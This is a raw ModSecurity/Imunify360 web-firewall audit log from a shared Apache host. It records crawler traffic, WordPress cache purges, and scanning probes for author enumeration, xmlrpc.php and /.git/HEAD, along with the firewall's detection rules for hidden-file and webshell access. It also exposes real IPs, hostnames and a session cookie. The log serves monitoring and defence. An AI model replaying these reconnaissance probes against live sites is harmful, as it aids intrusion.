Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751241915861051 967649 (- - -) Stopwatch2: 1751241915861051 967649; combined=2643, p1=90, p2=2383, p3=0, p4=0, p5=170, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4415ca34-Z-- --05311b6d-A-- [30/Jun/2025:05:35:18.067174 +0530] aGHUvgEk2LMjxRk5hI7aXgAAABg 20.171.207.232 32774 192.168.74.40 443 --05311b6d-B-- GET /https/aainag/images/testimonials/rajasthan-tours-from-agra/js/js/Rajasthan-Travel-Guides/https/Car-Rentals-Bikaner.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --05311b6d-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751241918052638 14782 (- - -) Stopwatch2: 1751241918052638 14782; combined=2696, p1=147, p2=2432, p3=0, p4=0, p5=117, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --05311b6d-Z-- --4eb3a312-A-- [30/Jun/2025:05:35:18.324566 +0530] aGHUvcRfT_cQNmUWMD9FgQAAAAk 103.185.74.40 39334 192.168.74.40 443 --4eb3a312-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --4eb3a312-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --4eb3a312-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751241917280116 1044839 (- - -) Stopwatch2: 1751241917280116 1044839; combined=2349, p1=85, p2=2098, p3=0, p4=0, p5=166, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4eb3a312-Z-- --c6c63158-A-- [30/Jun/2025:05:35:18.390838 +0530] aGHUu2LQz8G8bJi2amZlzAAAABA 13.201.27.234 59908 192.168.74.40 443 --c6c63158-B-- GET //?author=2 HTTP/1.1 Host: siaretech.in Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 --c6c63158-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751244220178361 18325 (- - -) Stopwatch2: 1751244220178361 18325; combined=4118, p1=175, p2=3768, p3=0, p4=0, p5=174, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3a1c7072-Z-- --10924e6d-A-- [30/Jun/2025:06:13:43.376306 +0530] aGHdvlGmupimtBqW6fmcPwAAAAI 103.185.74.40 61391 192.168.74.40 443 --10924e6d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --10924e6d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --10924e6d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751244222060147 1316567 (- - -) Stopwatch2: 1751244222060147 1316567; combined=2145, p1=101, p2=1894, p3=0, p4=0, p5=150, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --10924e6d-Z-- --d4d6a81d-A-- [30/Jun/2025:06:13:44.822718 +0530] aGHdv8bMdj5dXy1XkdBt7gAAAAo 103.185.74.40 42490 192.168.74.40 443 --d4d6a81d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --d4d6a81d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --d4d6a81d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751244223586997 1236053 (- - -) Stopwatch2: 1751244223586997 1236053; combined=3197, p1=105, p2=2919, p3=0, p4=0, p5=173, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d4d6a81d-Z-- --e23f143f-A-- [30/Jun/2025:06:13:45.103698 +0530] aGHdwbxxHXT09PQJe3eFpQAAAAk 20.171.207.114 37700 192.168.74.40 443 --e23f143f-B-- GET /returns_refunds.php/js/admin@oz/sweetalert-master/dist/admin@oz/sweetalert-master/dist/images/js/images/images/admin@oz/sweetalert-master/dist/js/log-in.php HTTP/1.1 x-openai-host-hash: 68043589 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate cookie: PHPSESSID=ovbt40d978660c645edhordhd5 host: ozautomotives.com.au --e23f143f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247821544013 14644 (- - -) Stopwatch2: 1751247821544013 14644; combined=3176, p1=154, p2=2871, p3=0, p4=0, p5=151, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --56e07733-Z-- --761ab10d-A-- [30/Jun/2025:07:13:42.359555 +0530] aGHrzXEhfJGl7tq6UcD1qgAAABM 103.185.74.40 11555 192.168.74.40 443 --761ab10d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --761ab10d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --761ab10d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247821152094 1208120 (- - -) Stopwatch2: 1751247821152094 1208120; combined=2070, p1=111, p2=1805, p3=0, p4=0, p5=154, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --761ab10d-Z-- --baa0c62c-A-- [30/Jun/2025:07:13:42.833117 +0530] aGHrzuDTWl20oNoHKoYiaAAAAAI 20.171.207.232 58796 192.168.74.40 443 --baa0c62c-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/Rajasthan-Travel-Guides/images/aainag/aainag/Madhya_Pradesh-Destinations.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --baa0c62c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --baa0c62c-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247823994230 14297 (- - -) Stopwatch2: 1751247823994230 14297; combined=2710, p1=123, p2=2446, p3=0, p4=0, p5=141, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --775c8d0a-Z-- --1a0dd34e-A-- [30/Jun/2025:07:13:44.149767 +0530] aGHrzj6M_Zn4JX7GEjug-gAAABw 103.185.74.40 34422 192.168.74.40 443 --1a0dd34e-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --1a0dd34e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --1a0dd34e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247822570412 1579679 (- - -) Stopwatch2: 1751247822570412 1579679; combined=2893, p1=107, p2=2628, p3=0, p4=0, p5=157, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1a0dd34e-Z-- --ebbeed0b-A-- [30/Jun/2025:07:13:45.215555 +0530] aGHr0eDTWl20oNoHKoYiagAAAAI 20.171.207.232 58796 192.168.74.40 443 --ebbeed0b-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/https/Rajasthan-Travel-Guides/aainag/Madhya_Pradesh-Destinations.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --ebbeed0b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --ebbeed0b-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247924523705 15006 (- - -) Stopwatch2: 1751247924523705 15006; combined=2661, p1=126, p2=2403, p3=0, p4=0, p5=131, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --edafdc56-Z-- --1293465a-A-- [30/Jun/2025:07:15:26.206916 +0530] aGHsMz6M_Zn4JX7GEjuhDgAAABw 103.185.74.40 10182 192.168.74.40 443 --1293465a-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --1293465a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --1293465a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247923906976 2300416 (- - -) Stopwatch2: 1751247923906976 2300416; combined=2567, p1=102, p2=2285, p3=0, p4=0, p5=179, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1293465a-Z-- --16d42829-A-- [30/Jun/2025:07:15:28.081304 +0530] aGHsNu5r2WcCfMQAvuMKBAAAABY 103.185.74.40 30448 192.168.74.40 443 --16d42829-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --16d42829-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --16d42829-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247926420452 1661315 (- - -) Stopwatch2: 1751247926420452 1661315; combined=3134, p1=105, p2=2852, p3=0, p4=0, p5=177, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --16d42829-Z-- --b659cd31-A-- [30/Jun/2025:07:15:28.113823 +0530] aGHsOHn0CqjRt5BZpUZ_tgAAAA8 20.171.207.232 53526 192.168.74.40 443 --b659cd31-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/Rajasthan-Travel-Guides/images/images/Car-Rentals-Agra.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b659cd31-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247930529503 17165 (- - -) Stopwatch2: 1751247930529503 17165; combined=3538, p1=166, p2=3214, p3=0, p4=0, p5=158, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --22dc5303-Z-- --f84f8f41-A-- [30/Jun/2025:07:15:32.480281 +0530] aGHsO5xe9YOH78sdvk4JTgAAABk 103.185.74.40 41270 192.168.74.40 443 --f84f8f41-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --f84f8f41-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f84f8f41-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247931513272 967452 (- - -) Stopwatch2: 1751247931513272 967452; combined=2775, p1=89, p2=2553, p3=0, p4=0, p5=133, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f84f8f41-Z-- --4203652d-A-- [30/Jun/2025:07:15:32.508878 +0530] aGHsPFbgXu3oqaK6XUC5fgAAABc 103.225.244.80 1048 192.168.74.40 443 --4203652d-B-- GET /xmlrpc.php HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Host: www.bangalorenightplans.com --4203652d-F-- HTTP/1.1 404 Not Found -- Action: Intercepted (phase 2) Stopwatch: 1751247932657408 5454 (- - -) Stopwatch2: 1751247932657408 5454; combined=3205, p1=90, p2=2670, p3=0, p4=0, p5=445, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --398e0040-Z-- --2e894124-A-- [30/Jun/2025:07:15:33.654885 +0530] aGHsPJrsHxWOLG_O_eqN4wAAAAE 103.185.74.40 9386 192.168.74.40 443 --2e894124-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --2e894124-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --2e894124-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751247932694988 960649 (- - -) Stopwatch2: 1751247932694988 960649; combined=2868, p1=144, p2=2263, p3=0, p4=0, p5=460, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2e894124-Z-- --cae4a71d-A-- [30/Jun/2025:07:15:33.940183 +0530] aGHsPUlPz7zSC91KZ5PrsgAAACw 18.221.19.190 38060 192.168.74.40 443 --cae4a71d-B-- GET /2024/oiwi-tv/wp-content/uploads/2024/05/Vector-12.png HTTP/1.1 Host: wpcodex.xyz Connection: keep-alive Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; ClaudeBot/1.0; +claudebot@anthropic.com) Accept: image/webp,image/apng,image/*,*/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f9174161-Z-- --bef0b849-A-- [30/Jun/2025:07:16:43.835196 +0530] aGHsgwR4PwKt6_LFNjBRmQAAAAE 43.166.7.113 58112 192.168.74.40 80 --bef0b849-B-- GET / HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --bef0b849-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --bef0b849-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751248003829088 6204 (- - -) Stopwatch2: 1751248003829088 6204; combined=3538, p1=90, p2=3244, p3=77, p4=3, p5=124, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --bef0b849-Z-- --f97b086f-A-- [30/Jun/2025:07:16:43.910304 +0530] aGHsgwi6qje7lrED5arbcwAAAAQ 20.171.207.232 57588 192.168.74.40 443 --f97b086f-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/Rajasthan-Travel-Guides/images/https/js/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --f97b086f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f97b086f-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/Rajasthan-Travel-Guides/images/https/js/our-services.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3b13d772-Z-- --babf4a3d-A-- [30/Jun/2025:07:46:33.188184 +0530] aGHzgId4HZ3iHNTrp1ssYAAAADo 198.55.98.76 46840 192.168.74.40 443 --babf4a3d-B-- GET /.git/HEAD HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/4.8 [en] (Windows NT 5.1; U) Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close --babf4a3d-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --babf4a3d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/head||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751249792639304 549449 (- - -) Stopwatch2: 1751249792639304 549449; combined=3605, p1=82, p2=3331, p3=0, p4=0, p5=192, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --babf4a3d-Z-- --00f8866f-A-- [30/Jun/2025:07:46:33.972897 +0530] aGHzgXuQoK4IDyYgUTmhxQAAAC4 20.171.207.232 51442 192.168.74.40 443 --00f8866f-B-- GET 